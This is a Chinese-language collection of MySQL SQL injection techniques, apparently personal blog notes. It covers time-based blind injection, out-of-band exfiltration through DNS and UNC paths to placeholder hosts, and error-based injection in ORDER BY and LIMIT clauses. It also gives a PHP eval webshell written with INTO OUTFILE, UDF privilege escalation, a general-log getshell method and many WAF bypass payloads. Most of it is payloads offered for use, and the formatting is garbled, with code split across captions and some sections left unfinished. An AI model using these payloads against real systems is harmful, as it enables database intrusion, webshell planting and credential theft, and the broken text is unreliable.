<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;</span><br><span class="line">+------------+</span><br><span class="line">| count(*)   |</span><br><span class="line">+------------+</span><br><span class="line">| 2651020120 |</span><br><span class="line">+------------+</span><br><span class="line">1 row in set (1 min 51.05 sec)</span><br></pre></td></tr></table></figure>
<p>(4).GET_LOCK<br>GET_LOCK(str,timeout):<br>试图分配一个名为name，超时时间为timeout秒的锁。timeout为负数时表示永不超时。该锁是独立的，即当有一个连接在使用名为str的锁时，其他的连接无法获得该锁。<br>1:获得成功； 0:获取超时（比如有其他客户端已经锁住了该锁）； NULL:发生错误（比如内存溢出或者线程被mysqladmin杀掉了）。<br>延时精确可控，利用环境有限，需要开两个session测试。</p>
<blockquote>
<p>官方解释:<br>GET_LOCK(str,timeout)</p>
</blockquote>
<p>Tries<br>to obtain a lock with a name given by the string str, using a timeout of<br>timeout seconds. A negative timeout value means infinite timeout. The lock is<br>exclusive. While held by one session, other sessions cannot obtain a lock of<br>the same name.</p>
<p>SESSION A<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select get_lock(&apos;test&apos;,1);</span><br><span class="line">+--------------------+</span><br><span class="line">| get_lock(&apos;test&apos;,1) |</span><br><span class="line">+--------------------+</span><br><span class="line">|                  1 |</span><br><span class="line">+--------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br></pre></td></tr></table></figure></p>
<p>SESSION B<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select get_lock(&apos;test&apos;,5);</span><br><span class="line">+--------------------+</span><br><span class="line">| get_lock(&apos;test&apos;,5) |</span><br><span class="line">+--------------------+</span><br><span class="line">|                  0 |</span><br><span class="line">+--------------------+</span><br><span class="line">1 row in set (5.00 sec)</span><br></pre></td></tr></table></figure></p>
<p>(5).RLIKE<br>通过<code>rpad</code>或<code>repeat</code>构造长字符串，加以计算量大的pattern，通过repeat的参数可以控制延时长短。<br>RPAD(str,len,padstr)<br>用字符串 padstr对 str进行右边填补直至它的长度达到 len个字符长度，然后返回 str。如果 str的长度长于 len’，那么它将被截除到 len个字符。<br>用 regexp ，rlike 或者 not rlike，三个关键字都可以实现，在关键字后加’’，里面直接写正则表达式就可以了,而like后面是跟通配符<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select rpad(&apos;a&apos;,4999999,&apos;a&apos;) RLIKE concat(repeat(&apos;(a.*)+&apos;,30),&apos;b&apos;);</span><br><span class="line">+-------------------------------------------------------------+</span><br><span class="line">| rpad(&apos;a&apos;,4999999,&apos;a&apos;) RLIKE concat(repeat(&apos;(a.*)+&apos;,30),&apos;b&apos;) |</span><br><span class="line">+-------------------------------------------------------------+</span><br><span class="line">|                                                           0 |</span><br><span class="line">+-------------------------------------------------------------+</span><br><span class="line">1 row in set (5.27 sec)</span><br></pre></td></tr></table></figure></p>
<p><strong>其他位置的注入</strong><br>1.Get、Post<br>2.UA头<br>3.referer头<br>4.cookie</p>
<p><strong>0x07 外带通道注入</strong></p>
<blockquote>
<p>使用背景：<br>在进行sql注入攻击的时候我们经常会遇见无回显的情况，那我们就不能进行注入了么？<br>其实攻击可能已经成功了，But应用程序未返回任何结果，使你误以为攻击失败。<br>一种获取数据的有效方法是使用带外通道<br>能够在数据库中执行任意SQL语句后,我们可以利用数据的一些内置功能在数据库与自己的计算机直接建立网络连接,通过它传送从数据库中收集的任何信息<br>一般可以提取数据的途径:<br>通过HTTP(S)请求、DNS剖析、文件系统、电子邮件等等<br>对于MySQL而言<br>同样和文件读写一样，需要secure_file_priv这个全局变量控制的权限，具体见上文中对该变量的介绍。<br>利用条件：</p>
</blockquote>
<p>全局变量secure_file_priv = ‘ ‘<br>可以用SQL server连接到mysql数据库</p>
<p><strong>基础的知识</strong><br>DNS解析原理</p>
<p><strong>使用DNS解析提取数据</strong><br>条件：skip_name_resolve为off，MySQL支持DNS解析<br>在mysql中会对查询语句中的ip和网址尝试DNS解析。例如：<br><figure class="highlight plain"><figcaption><span>load_file(concat(‘\\\\’,version()’yoursite.com\\a.txt’));</span><a href="//读取文件操作```">link</a></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">SELECT...INTO OUTFILE 命令可将任意一个查询的输出指向一个文件</span><br><span class="line">如：</span><br><span class="line">要想收到文件必须要在计算机上建立SMP共享允许匿名写入访问。</span><br><span class="line">如果无法接受到文件可能是由于smb服务器的配置有问题</span><br><span class="line">然后我们可以通过抓包看MySql发出的DNS查询数据</span><br><span class="line">或者使用网上现成的http://dnsbin.zhack.ca/ 就可以看到mysql发送过来的数据</span><br><span class="line">SELECT...INTO OUTFILE 命令可将任意一个查询的输出指向一个文件</span><br><span class="line">如：</span><br><span class="line">```select * into outfile &apos;\\\\xxxx.com\\share\\output.txt&apos; from users;</span><br></pre></td></tr></table></figure></p>
<p>要想收到文件必须要在计算机上建立SMB共享允许匿名写入访问。<br>如果无法接受到文件可能是由于smb服务器的配置有问题(139端口打开)</p>
<p>可以使用  ||, or, |, and, &amp;&amp;, &amp;, &gt;&gt;, &lt;&lt;, ^, xor, &lt;=, &lt;, &lt;=&gt;,&gt;, &gt;=, mul, /, div,<br>-, +, %<br><figure class="highlight plain"><figcaption><span>user set username</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">**0x08 SMB Relay注入攻击**</span><br><span class="line">以后补全</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">**0x09 order by注入**</span><br><span class="line">报错注入</span><br><span class="line">```SELECT user,host from mysql.user order by 1 and updatexml(1,if(1=1,user(),2),1)</span><br></pre></td></tr></table></figure></p>
<p>时间盲注<br><figure class="highlight plain"><figcaption><span>user,host from mysql.user order by if(1</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">改变返回数据</span><br><span class="line">```select .... order by id|2 //由此来改变返回的数据的顺序 变化之后 他进行的操作是将i</span><br><span class="line">d的值进行按位或在进行排序</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><figcaption><span>.... order by id|(boolean payload)+1</span><a href="/由此变化为布尔盲注```">link</a></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">不太理解此处是如何报错的</span><br><span class="line"></span><br><span class="line">写shell，一般报错注入无法写入shell，所以可以使用：</span><br><span class="line">```select test from test where id=1 into outfile &quot;C:\www\xx.php&quot; lines terminated by &apos;&lt;?php @eval($_POST[&quot;a&quot;]);?&gt;&apos;	//可用于where,order by,limit之后</span><br></pre></td></tr></table></figure>
<p><strong>0x10 limit注入</strong><br>1.可以使用union select</p>
<p>2.报错注入<br><figure class="highlight plain"><figcaption><span>1 from mysql.user order by 1 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);</span><a href="//仅限于limit后```">link</a></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">**0x11 提权**</span><br><span class="line">首先udf(user defined function)是用户自定义函数，思路及上传udf.dll 添加shell函数，去执行系统</span><br><span class="line">命令。</span><br><span class="line">要注意几点:</span><br><span class="line">1. mysql4.1­5.1版本中 在添加函数时，对udf.dll的位置做出限制 不能出现”/”,”\”符号，及无法使</span><br><span class="line">用绝对路径。</span><br><span class="line">2. mysql5.1后再次对位置做出了限制,上传的udf.dll必须在mysql/lib/plugin/目录下，但是plugin</span><br><span class="line">默认是不存在的。</span><br><span class="line"></span><br><span class="line">**mysql信息收集</span><br><span class="line">版本号 version()**</span><br><span class="line">mysql目录的绝对路径 @@basedir</span><br><span class="line">上传udf,dll</span><br><span class="line">最终目标是将udf.dll上传至mysql/lib/plugin下 </span><br><span class="line">所以先测试此目录是否可创建目录 上传文件。 </span><br><span class="line">如果此目录无法完成,寻找可上传点，上传udf.dll，最后通过select load_file(‘C:/www/udf.dll’)</span><br><span class="line"></span><br><span class="line">**上传udf.dll**</span><br><span class="line">最终目标是将udf.dll上传至mysql/lib/plugin下 </span><br><span class="line">所以先测试此目录是否可创建目录 上传文件。 </span><br><span class="line">如果此目录无法完成,寻找可上传点，上传udf.dll，最后通过select load_file(‘C:/www/udf.dll’)</span><br><span class="line">into dumpfile ‘C:/mysql/lib/plugin/udf.dll’ 将udf.dll上传至目的地，中间会遇到plugin不存在的</span><br><span class="line">问题，可以通过NTFS ADS流创建文件夹，语句：</span><br></pre></td></tr></table></figure></p>
<p>select ‘test’ into dumpfile ‘C:/Program Files/phpStudy/MySQL/lib::INDEX_A<br>LLOCATION’;<br>select ‘test’ into dumpfile ‘C:/Program Files/phpStudy/MySQL/lib/plugin::<br>INDEX_ALLOCATION’; //测试失败-_-,一定几率成功<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">**添加函数**</span><br><span class="line">```create function shell returns strings soname &apos;udf.dll&apos;</span><br></pre></td></tr></table></figure></p>
<p><strong>root权限写木马</strong><br><figure class="highlight plain"><figcaption><span>'0x+hex(xx.exe)' into dumpfile 'C:/xxx.exe'```</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">**提权姿势**</span><br><span class="line">phpmyadmin getshell</span><br><span class="line"></span><br><span class="line">在into outfile被禁用，尝试登陆phpmyadmin进行getshell(mysql为root权限)： </span><br><span class="line">利用general log file,general log是记录mysql所有操作的操作日志，利用此日志去写入shell。 </span><br><span class="line">步骤：</span><br><span class="line">1. general 为ON		`show variables like &apos;%general%&apos;;`</span><br><span class="line">若要打开:`set global general_log=on;`</span><br><span class="line">2. 在全局变量中设置general log file地址（将其设置在网站目录下 如：</span><br><span class="line">C:\phpstudy\www\shell.php 则以后执行的语句都将记录在此文件下）</span><br><span class="line">指定输出的log存放在表里面:</span><br><span class="line">```set global log_output=&apos;table&apos;;</span><br></pre></td></tr></table></figure></p>
<p>3.执行语句:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SET names &apos;utf8&apos; COLLATE &apos;utf8_general_ci&apos;;</span><br><span class="line">SET names &apos;utf8&apos; collate &apos;utf8_general_ci&apos;;</span><br><span class="line">select &lt;?php phpinfo() ?&gt;;</span><br></pre></td></tr></table></figure></p>
<p><strong>0x12 移位溢注技术</strong><br>知道表名不清楚列的情况<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.由原语句：union select 1,2,3,..,p..,n-k,* from TABLE 可以得出该联合查询的目的是构造和原网站相同列数的查询结构，使得页面上可以显示对应的数字；这条语句相当于是做了两次查询并将它们的结果合并，第一次做了select 1,2,3,..,n-k from TALBE ，第二次做了select * from TALBE ，然后将它们的结果合并。</span><br><span class="line">2.只要满足原理1的要求，保障联合查询的结果和原网站查询的结果列数一致即可；因此可以将TALBE.*向前移动至页面显示的数字处来爆出TALBE列中的内容。</span><br><span class="line">即:</span><br><span class="line">```id=1 union select 1,admin,2.* from admin</span><br></pre></td></tr></table></figure></p>
<p>如果MYSQL小于5.0的情况下所具备的条件和ACCESS一样，也可以使用此方法注入，如果是MYSQL大于5.0的版本，使用此方法可以省去获得列名的步骤。</p>
<p>结合join查询法：<br><figure class="highlight plain"><figcaption><span>e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(selec</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">t 4)d union select * from test.a)e; //from后面的表结合做笛卡尔积运算， (selec</span><br><span class="line">t 1)a是将（select 1）的结果用别名a来代替 相当与(select 1) as a</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><figcaption><span>* from user where id</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;</span><br></pre></td></tr></table></figure>
<p>+————-+———-+———-+————-+<br>| id          | username | password | email       |<br>+————-+———-+———-+————-+<br>| 1           | admin    | admin888 | <a href="mailto:110@110.com" target="_blank" rel="noopener">110@110.com</a> |<br>| <a href="mailto:120@120.com" target="_blank" rel="noopener">120@120.com</a> | 1        | 1        | 1           |<br>+————-+———-+———-+————-+</p>
<p><strong>0x13 特别报错</strong><br>在限制了information_schema,columns,tables等情况下获取一些爆破信息</p>
<ol>
<li>字段重复爆出字段<br>select num from test.a where id=1 and (select <em> from (select </em> from a as<br>a join a as b)as c) //导致c字段重复</li>
<li>利用polygon()函数 在已知字段的情况下爆出表名<figure class="highlight plain"><figcaption><span>num from a where id</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">3.使用不存在函数 爆出数据库</span><br><span class="line">```select num from a where id=1-a();</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p><strong>0x14 简单绕过技巧</strong><br>1.注释符：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#， </span><br><span class="line">-- X(X为任意字符)</span><br><span class="line">/*(MySQL-5.1)</span><br><span class="line">;%00</span><br><span class="line">`</span><br><span class="line">&apos;or 1=1;%00</span><br><span class="line">&apos;or 1=1 union select 1,2`&apos;</span><br><span class="line">&apos;or 1=1 #</span><br><span class="line">&apos;/*!50000or*/ 1=1 -- -      //版本号为5.1.38时只要小于50138</span><br><span class="line">&apos;/*!or*/ 1=1 -- -</span><br></pre></td></tr></table></figure></p>
<p>2.前缀：</p>
<p>任意混合 + - ~ !</p>
<figure class="highlight plain"><figcaption><span>--+2</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">测试后发现and/or后面可以跟上偶数个!、~可以替代空格，也可以混合使用(混合后规律又不同)，and/or前的空格可以省略</span><br><span class="line"></span><br><span class="line">```&apos;or- -!!!1=1；</span><br></pre></td></tr></table></figure>
<p>3.运算符：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">^, =, !=, %, /, *, &amp;, &amp;&amp;, |, ||, &lt;, &gt;, &lt;&lt;, &gt;&gt;, &gt;=, &lt;=, &lt;&gt;, &lt;=&gt;, XOR,DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN,……</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><figcaption><span>1 rlike '1```</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">4.空格 </span><br><span class="line">&gt;09 Horizontal Tab </span><br><span class="line">0A New Line</span><br><span class="line">0B Vertical Tab </span><br><span class="line">0C New Page</span><br><span class="line">0D Carriage Return</span><br><span class="line">A0 Non­breaking Space</span><br><span class="line">20 Space</span><br><span class="line">使用():select(id)from(a); </span><br><span class="line">使用/* ! select*/&amp;&amp;select/**/from</span><br><span class="line">&apos;or+(1)sounds/**/like&quot;1&quot;--%a0-</span><br><span class="line"></span><br><span class="line">5.不用逗号</span><br><span class="line">基于时间的盲注：```case when xxx then sleep() else xxxx;</span><br></pre></td></tr></table></figure>
<p>对于substr和mid:<br><figure class="highlight plain"><figcaption><span>from 1 for 1);</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mid(data from 1 for 1);</span><br></pre></td></tr></table></figure></p>
<p>使用like<br>在过滤逗号的情况下使用union查询：<br><figure class="highlight plain"><figcaption><span>* from teat.a union select * from (select 1)a join (select 2)b join (select 3) c ;```</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">join对表进行了操作，所以建立了虚表以供操作</span><br><span class="line"></span><br><span class="line">6.不用引号</span><br><span class="line">&lt;li&gt;hex编码</span><br><span class="line">&lt;li&gt;char()</span><br><span class="line">e.g.:</span><br><span class="line">```table_schema=&quot;test&quot;换为</span><br><span class="line">table_schema=0x74657374</span><br></pre></td></tr></table></figure></p>
<p>7.过滤where<br><figure class="highlight plain"><figcaption><span>* from information_schema.tables group by table_schema having table_schema</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">8.过滤having</span><br><span class="line">`&apos;and(select substr(group_concat(pass),1,1)from users)=&apos;a`</span><br><span class="line"></span><br><span class="line">having和where的区别：</span><br><span class="line">作用的对象不同。WHERE 子句作用于表和视图，HAVING 子句作用于组。</span><br><span class="line">WHERE 在分组和聚集计算之前选取输入行（因此，它控制哪些行进入聚集计算）， 而 HAVING 在分组和聚集之后选取分组的行。因此，WHERE 子句不能包含聚集函数； 因为试图用聚集函数判断那些行输入给聚集运算是没有意义的。 相反，HAVING 子句总是包含聚集函数。（严格说来，你可以写不使用聚集的 HAVING 子句， 但这样做只是白费劲。同样的条件可以更有效地用于 WHERE 阶段。）</span><br><span class="line">对比一下：</span><br></pre></td></tr></table></figure></p>
<p>SELECT ip,ip1,ip2,ip3,ip4,count(<em>) ct,mobile_info FROM <code>lmaster_log</code><br>        GROUP BY ip1,ip2,ip3 ORDER BY ip1,ip2,ip3,ip4 HAVING ct &gt; 2;<br>SELECT ip,ip1,ip2,ip3,ip4,count(</em>) ct,mobile_info FROM <code>lmaster_log</code><br>        GROUP BY ip1,ip2,ip3 HAVING ct &gt; 2 ORDER BY ip1,ip2,ip3,ip4;<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">9.过滤substr、substring</span><br></pre></td></tr></table></figure></p>
<p>?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74　<br>或者</p>
<p>substr((select ‘password’),1,1) = 0x70<br>strcmp(left(‘password’,1), 0x69) = 1<br>strcmp(left(‘password’,1), 0x70) = 0<br>strcmp(left(‘password’,1), 0x71) = -1<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">10.类型转换</span><br></pre></td></tr></table></figure></p>
<p>‘ or 1=true #true=1, false=0<br>‘ or 1 #true<br>‘ or version()=5.5 #5.5.41-log</p>
<p>‘ or round(pi(),1)+true+true+0.4=version() #3.1+1+1+0.4</p>
<p>select <em> from users where ‘a’=’b’=’c’<br>select </em> from users where (‘a’=’b’)=’c’<br>select <em> from users where (false)=’c’<br>select </em> from users where (0)=’c’<br>select <em> from users where (0)=0<br>select </em> from users where true<br>select * from users<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">效果相同</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">**0x14 对waf的深入研究与绕过**	</span><br><span class="line">1.关键字过滤</span><br><span class="line">空格</span><br><span class="line"></span><br><span class="line">过滤代码`/\s/`</span><br><span class="line">不再赘述</span><br><span class="line"></span><br><span class="line">过滤代码`/\sor\s/i,/\sand\s/i`</span><br></pre></td></tr></table></figure></p>
<p>‘||1=’1     #or<br>‘=’<br>‘&amp;&amp;1=’1     #and<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">过滤代码`/union\s+select/i`</span><br></pre></td></tr></table></figure></p>
<p>‘and(true)like(false)union(select(pass)from(users))#<br>‘union [all|distinct] select pass from users#<br>‘union%a0select pass from users#<br>‘union/<em>!select</em>/pass from users#<br>/vuln.php?id=1 union/<em>&amp;sort=</em>/select pass from users– -<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">如果单独过滤union,使用盲注来获取数据</span><br><span class="line">`&apos;and(select pass from users limit 1)=&apos;secret`</span><br><span class="line">2.一些函数</span><br><span class="line">**0x15 常用的东西**</span><br></pre></td></tr></table></figure></p>
<p>lpad(data,1,space(1)) // lpad(‘hi’,4,’?’) = ‘??hi’<br>rpad(data,1,space(1)) // rpad(‘hi’,4,’?’) = ‘hi??’<br>left(data,1)<br>reverse(right(reverse(data),1))<br>insert(insert(version(),1,0,space(0)),2,222,space(0))<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">有些函数有类似搜索匹配的功能</span><br></pre></td></tr></table></figure></p>
<p>‘-if(locate(‘f’,data),1,0)#<br>‘-if(locate(‘fo’,data),1,0)#<br>‘-if(locate(‘foo’,data),1,0)#<br>instr(), position()<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">使用函数进行字符串的切割</span><br></pre></td></tr></table></figure></p>
<p>length(trim(leading ‘a’ FROM data)) # length will be shorter<br>length(replace(data, ‘a’, ‘’)) # length will be shorter<br>2种方式都是相同效果<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">```</span><br><span class="line">1个控制流程操作(select, case, if(), ...)</span><br><span class="line">1个比较操作(=, like, mod(), ...)</span><br><span class="line">1个字符串的猜解(mid(), left(), rpad(), …)</span><br><span class="line">1个字符串生成(0x61, hex(), conv())</span><br></pre></td></tr></table></figure></p>
<p><strong>使用conv([10-36],10,36)可以实现所有字符的表示</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">false !pi()           0     ceil(pi()*pi())           10 A      ceil((pi()+pi())*pi()) 20       K</span><br><span class="line">true !!pi()           1     ceil(pi()*pi())+true      11 B      ceil(ceil(pi())*version()) 21   L</span><br><span class="line">true+true             2     ceil(pi()+pi()+version()) 12 C      ceil(pi()*ceil(pi()+pi())) 22   M</span><br><span class="line">floor(pi())           3     floor(pi()*pi()+pi())     13 D      ceil((pi()+ceil(pi()))*pi()) 23 N</span><br><span class="line">ceil(pi())            4     ceil(pi()*pi()+pi())      14 E      ceil(pi())*ceil(version()) 24   O</span><br><span class="line">floor(version())      5     ceil(pi()*pi()+version()) 15 F      floor(pi()*(version()+pi())) 25 P</span><br><span class="line">ceil(version())       6     floor(pi()*version())     16 G      floor(version()*version()) 26   Q</span><br><span class="line">ceil(pi()+pi())       7     ceil(pi()*version())      17 H      ceil(version()*version()) 27    R</span><br><span class="line">floor(version()+pi()) 8     ceil(pi()*version())+true 18 I      ceil(pi()*pi()*pi()-pi()) 28    S</span><br><span class="line">floor(pi()*pi())      9     floor((pi()+pi())*pi())   19 J      floor(pi()*pi()*floor(pi())) 29 T</span><br></pre></td></tr></table></figure></p>
<p>3.从初级到高级的9类WAF绕过技巧<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1)大小写混合 </span><br><span class="line">2)替换关键字 </span><br><span class="line">3)使用编码 </span><br><span class="line">4)使用注释 </span><br><span class="line">5)等价函数与命令 </span><br><span class="line">6)使用特殊符号 </span><br><span class="line">7)HTTP参数控制 </span><br><span class="line">8)缓冲区溢出 </span><br><span class="line">9)整合绕过</span><br></pre></td></tr></table></figure></p>
<p>(1).大小写绕过<br>只针对小写或大写的关键字匹配技术正则表达式<code>/express/i</code>匹配时大小写不敏感便无法绕过这是最简单的绕过技术<br><code>z.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4</code><br>(2).关键字替换<br>双写<br>(3).使用编码<br>1.URL编码<br>在Chrome中输入一个链接非保留字的字符浏览器会对其URL编码如空格变为%20、单引号%27、左括号%28、右括号%29</p>
<p>普通的URL编码可能无法实现绕过不过存在某种情况URL编码只进行了一次解码过滤可以用两次编码绕过</p>
<p>page.php?id=1%252f%252a<em>/UNION%252f%252a/SELECT<br>2.十六进制编码<br>`z.com/index.php?page_id=-15 /</em>!u%6eion<em>/ /</em>!se%6cect*/ 1,2,3,4,SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))`<br>示例代码中前者是对单个字符十六进制编码后者则是对整个字符串编码对整个字符串编码相对来说较少见一点</p>
<p>3.Unicode编码<br>Unicode有所谓的标准编码和非标准编码假设我们用的utf-8为标准编码那么西欧语系所使用的就是非标准编码了</p>
<p>看一下常用的几个符号的一些Unicode编码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">单引号：%u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7</span><br><span class="line"></span><br><span class="line">空格：%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0</span><br><span class="line"></span><br><span class="line">左括号：%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8</span><br><span class="line"></span><br><span class="line">右括号：%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9</span><br></pre></td></tr></table></figure></p>
<p>举例：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?id=10%D6&apos;%20AND%201=2%23　　</span><br><span class="line"></span><br><span class="line">SELECT &apos;Ä&apos;=&apos;A&apos;; #1</span><br></pre></td></tr></table></figure></p>
<p>两个示例中，前者利用双字节绕过，比如对单引号转义操作变成\’，那么就变成了%D6%5C’，%D6%5C构成了一个款字节即Unicode字节，单引号可以正常使用。</p>
<p>第二个示例使用的是两种不同编码的字符的比较，它们比较的结果可能是True或者False，关键在于Unicode编码种类繁多，基于黑名单的过滤器无法处理所以情况，从而实现绕过。</p>
<p>另外平时听得多一点的可能是utf-7的绕过，还有utf-16、utf-32的绕过，后者从成功的实现对google的绕过，有兴趣的朋友可以去了解下。</p>
